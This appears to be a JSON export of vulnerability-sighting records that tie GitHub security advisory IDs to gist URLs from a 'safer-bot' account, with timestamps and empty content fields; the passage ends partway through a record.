{"uuid": "57a97d12-97bc-4e9f-91bb-e4dcdbd84f40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/6fe1168bf950f9df3a2fbb2dd8ad1cc6", "content": "", "creation_timestamp": "2025-07-16T16:01:16.000000Z"}, {"uuid": "7ad14951-a940-42ef-aea1-217f3a9e72ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mc7-4q67-w48m", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "36a99f4a-56d9-46e6-bd91-2f6fc76a274f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37g-rhq8-7m4j", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "7a262c6e-c610-4aff-96e1-eeae489ef7b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98wm-3w3q-mw94", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "40a12903-a7b0-4cab-a2f5-c93251368844", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-gqgf-c4p9", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "12346b0d-9e0e-4052-819a-350423f737ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c4r9-r8fh-9vj2", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "5761fd19-420f-4ff7-bb4d-44e343d901c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8mx3-gp3p-vgg7", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "2535b9f5-0e81-49d4-afa7-cb852b8ee189", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "601c2ed4-b899-477f-af72-cd89089c695d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hhhw-99gj-p3c3", "type": "seen", "source": "https://gist.github.com/safer-bot/315612cf6371bc59c08bf1d8656dc747", "content": "", "creation_timestamp": "2025-07-16T16:06:16.000000Z"}, {"uuid": "9ea24cc6-829b-4054-a67f-a3bcf61abf5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vgq5-3255-v292", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "842b507f-5313-4083-916e-d5a8bfc71d79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "d1c1a596-8ced-4837-a05d-a4c089a3a745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "406c1cd3-da44-4b9c-bf64-461546a10d63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "bff0e55b-0a13-4cc0-9261-abf42717852b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "3ed1ca59-0ffb-4fc2-bb2e-d92001ea1c8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "bddee49e-999d-4104-92ce-98298af98012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "9334c273-c8f8-490a-b021-b3e60aa6bbcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/81bdd27a41c3f758707e76211219bc8b", "content": "", "creation_timestamp": "2025-07-16T16:05:44.000000Z"}, {"uuid": "596dd90a-14d7-42a7-ae1b-fce533b24600", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/b9acfe210a0713e9408c121c9e8a66d7", "content": "", "creation_timestamp": "2025-07-16T16:08:31.000000Z"}, {"uuid": "0865f1b6-5e8a-4b70-8ac6-8afc9cc994a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/b9acfe210a0713e9408c121c9e8a66d7", "content": "", "creation_timestamp": "2025-07-16T16:08:31.000000Z"}, {"uuid": "434baacc-5875-4f26-89d0-a14a13c47815", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/b9acfe210a0713e9408c121c9e8a66d7", "content": "", "creation_timestamp": "2025-07-16T16:08:31.000000Z"}, {"uuid": "c4d6c9e9-4901-46eb-ad3e-4d5318edcbb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/b9acfe210a0713e9408c121c9e8a66d7", "content": "", "creation_timestamp": "2025-07-16T16:08:31.000000Z"}, {"uuid": "88d0163b-3a9a-4ced-8a1b-0319a3c3a98c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/b9acfe210a0713e9408c121c9e8a66d7", "content": "", "creation_timestamp": "2025-07-16T16:08:31.000000Z"}, {"uuid": "173e899d-04f2-4c6b-bc63-598701c93417", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/b9acfe210a0713e9408c121c9e8a66d7", "content": "", "creation_timestamp": "2025-07-16T16:08:31.000000Z"}, {"uuid": "d432e516-21cb-4983-b8bc-866940aefa20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2pj2-gchf-wmw7", "type": "seen", "source": "https://gist.github.com/safer-bot/3089461ed1f56106d76f6c5029a20157", "content": "", "creation_timestamp": "2025-07-16T16:10:35.000000Z"}, {"uuid": "a437f73b-7c3e-4bef-8d9c-7465121a6420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q62h-jw38-24vh", "type": "seen", "source": "https://gist.github.com/safer-bot/3089461ed1f56106d76f6c5029a20157", "content": "", "creation_timestamp": "2025-07-16T16:10:35.000000Z"}, {"uuid": "d4796c74-e654-4379-8448-2eb61eded14b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rpm-4x8c-pvqg", "type": "seen", "source": "https://gist.github.com/safer-bot/3089461ed1f56106d76f6c5029a20157", "content": "", "creation_timestamp": "2025-07-16T16:10:35.000000Z"}, {"uuid": "dbec5f11-aeb1-4f02-9d8c-b96d7143d59b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/3089461ed1f56106d76f6c5029a20157", "content": "", "creation_timestamp": "2025-07-16T16:10:35.000000Z"}, {"uuid": "6b87c148-4aee-4498-8bb8-6ad79252aaeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a110fe87b37d378acb2d34ee4b2439e4", "content": "", "creation_timestamp": "2025-07-16T16:22:16.000000Z"}, {"uuid": "43765f2d-ebc4-41d5-bf91-e3e8597ad0f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mc7-4q67-w48m", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "b109756e-43ec-4e38-990b-a8c604b66ee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98wm-3w3q-mw94", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "7549d786-82d9-4b98-8559-82425541a704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37g-rhq8-7m4j", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "7c2af8f3-9c80-4596-b919-e60e89fe49c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-gqgf-c4p9", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "8e01bcd4-8e5d-4e2c-ac73-44fec25b9da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c4r9-r8fh-9vj2", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "b04a04cf-9e4f-4761-b24a-cfc930fd3be4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "3bad4c9a-f36b-4a63-88a4-262a57a197df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hhhw-99gj-p3c3", "type": "seen", "source": "https://gist.github.com/safer-bot/5a6abdd77db71e446fe4eac85870cc78", "content": "", "creation_timestamp": "2025-07-16T16:21:43.000000Z"}, {"uuid": "c80c68e1-28d5-4726-a849-6865fe24be78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/b2fb05428cabcfcce5d63a3da7531cfd", "content": "", "creation_timestamp": "2025-07-16T16:26:08.000000Z"}, {"uuid": "5f42e245-41de-4d9d-b788-f31de7e50700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/b2fb05428cabcfcce5d63a3da7531cfd", "content": "", "creation_timestamp": "2025-07-16T16:26:08.000000Z"}, {"uuid": "cfe32129-6911-4af0-8348-600acb74bec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63qc-p2x4-9fgf", "type": "seen", "source": "https://gist.github.com/safer-bot/b2fb05428cabcfcce5d63a3da7531cfd", "content": "", "creation_timestamp": "2025-07-16T16:26:08.000000Z"}, {"uuid": "cb91d493-1ed5-47f5-9ab1-5a9064f72b06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-727h-hrw8-jg8q", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "14c54129-362d-4726-941f-403f3bc174b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-76h9-2vwh-w278", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "45338bf1-4502-4595-b2dd-3c7d98b38ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h29-qq92-wj7f", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "3d449479-45af-4b84-9849-0e1d5d8c6b68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v7wg-cpwc-24m4", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "96679c4c-bfcb-4011-aa23-881bee09e306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "907353d1-71bd-4b7e-8498-cceb6e7f9cc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-673j-qm5f-xpv8", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "988e9717-a89a-4035-a33d-fbf16b7ef39c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-562r-vg33-8x8h", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "8c1db41a-91f9-4971-a915-cd59d2e33dd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mcm-j9cj-3vc3", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "fe0aa564-8b55-42cd-bce4-f5184f2d8a5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r38f-c4h4-hqq2", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "c0db67d1-cadb-40fe-b6c6-f8bcbed9b9bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/06ba3e736cb2a22693a2da2a15674353", "content": "", "creation_timestamp": "2025-07-16T16:29:40.000000Z"}, {"uuid": "721de984-fea6-48f0-a0fd-6803703f5371", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ac50a9d06128c885572283a56c63d90e", "content": "", "creation_timestamp": "2025-07-16T16:29:07.000000Z"}, {"uuid": "3dc05c09-d722-4326-84cb-c52115b4c0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p53j-g8pw-4w5f", "type": "seen", "source": "https://gist.github.com/safer-bot/ac50a9d06128c885572283a56c63d90e", "content": "", "creation_timestamp": "2025-07-16T16:29:07.000000Z"}, {"uuid": "b86cf546-35eb-4f01-8d79-f729bb1b1046", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/998030bab79e6cb4eb4ebce8dc96b52d", "content": "", "creation_timestamp": "2025-07-16T16:33:45.000000Z"}, {"uuid": "e8d9d4c0-15c2-4d74-9587-7a65699148f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/998030bab79e6cb4eb4ebce8dc96b52d", "content": "", "creation_timestamp": "2025-07-16T16:33:45.000000Z"}, {"uuid": "f81bdac7-3dfa-4911-bc4f-74d6ed0b7c08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgwf-w82q-5jrr", "type": "seen", "source": "https://gist.github.com/safer-bot/998030bab79e6cb4eb4ebce8dc96b52d", "content": "", "creation_timestamp": "2025-07-16T16:33:45.000000Z"}, {"uuid": "dbae8972-a30a-4d93-9b2c-89911d4efb41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/e7e654a74a59c626a943d4936ee3ebf4", "content": "", "creation_timestamp": "2025-07-16T16:34:17.000000Z"}, {"uuid": "2078b35a-2bbd-442f-b611-12f8433275db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/e7e654a74a59c626a943d4936ee3ebf4", "content": "", "creation_timestamp": "2025-07-16T16:34:17.000000Z"}, {"uuid": "eced822f-bdaa-4a62-856c-c56a68920a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/e7e654a74a59c626a943d4936ee3ebf4", "content": "", "creation_timestamp": "2025-07-16T16:34:17.000000Z"}, {"uuid": "fdc7ab09-fb19-4841-9f7e-dac21ff21ac0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/e7e654a74a59c626a943d4936ee3ebf4", "content": "", "creation_timestamp": "2025-07-16T16:34:17.000000Z"}, {"uuid": "b1eb4702-652e-4381-9f8b-8e76c6cd2611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/32df34892f5eaff59f3a88ee6174c7aa", "content": "", "creation_timestamp": "2025-07-16T16:42:34.000000Z"}, {"uuid": "875e6f26-1851-4760-9355-3b34fd132b1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/32df34892f5eaff59f3a88ee6174c7aa", "content": "", "creation_timestamp": "2025-07-16T16:42:34.000000Z"}, {"uuid": "6f0d4915-45b4-407e-b2a0-bbcf70ca38aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/bfa22d87bbe083dd48b79bcd7697f179", "content": "", "creation_timestamp": "2025-07-16T16:45:04.000000Z"}, {"uuid": "0572110a-4877-425f-89fa-5192230f8ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/bfa22d87bbe083dd48b79bcd7697f179", "content": "", "creation_timestamp": "2025-07-16T16:45:04.000000Z"}, {"uuid": "031dd0a8-8933-4fe8-b7ea-a765450e3caf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aed67fa3d73ad083c0db2b4d61593d", "content": "", "creation_timestamp": "2025-07-16T16:48:41.000000Z"}, {"uuid": "007e632b-a047-40ea-9e63-88033aa636c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aed67fa3d73ad083c0db2b4d61593d", "content": "", "creation_timestamp": "2025-07-16T16:48:41.000000Z"}, {"uuid": "ce431bae-10a8-4dc9-9dda-ed3958c60e73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/ff4ec2f8ba310559a12c37f09478dd5a", "content": "", "creation_timestamp": "2025-07-16T16:51:41.000000Z"}, {"uuid": "227e33d7-6af7-46f1-9d60-0f108a07ae54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/075975ba50384f3d05d143e04a109036", "content": "", "creation_timestamp": "2025-07-16T16:56:00.000000Z"}, {"uuid": "7f8e4851-0c0f-4bff-b2e2-a91304101da5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/075975ba50384f3d05d143e04a109036", "content": "", "creation_timestamp": "2025-07-16T16:56:00.000000Z"}, {"uuid": "81d7aaee-a1b5-4654-9f4f-5243adaad556", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/075975ba50384f3d05d143e04a109036", "content": "", "creation_timestamp": "2025-07-16T16:56:00.000000Z"}, {"uuid": "b2ab02d4-1d88-4827-968b-6c4bd3afc512", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/075975ba50384f3d05d143e04a109036", "content": "", "creation_timestamp": "2025-07-16T16:56:00.000000Z"}, {"uuid": "d40321c5-34e6-48d7-b18d-4b08c79757c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/c70d17186c86e516c2b28ad2eeab916e", "content": "", "creation_timestamp": "2025-07-16T16:59:08.000000Z"}, {"uuid": "2359d506-f9c5-4ecd-ade0-1bb8e702e7d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/f2f0003a494ace0ad15363f44df8eb77", "content": "", "creation_timestamp": "2025-07-16T17:01:36.000000Z"}, {"uuid": "b772fc69-82a4-4430-ae08-202983661db2", "vulnerability_lookup_origin": 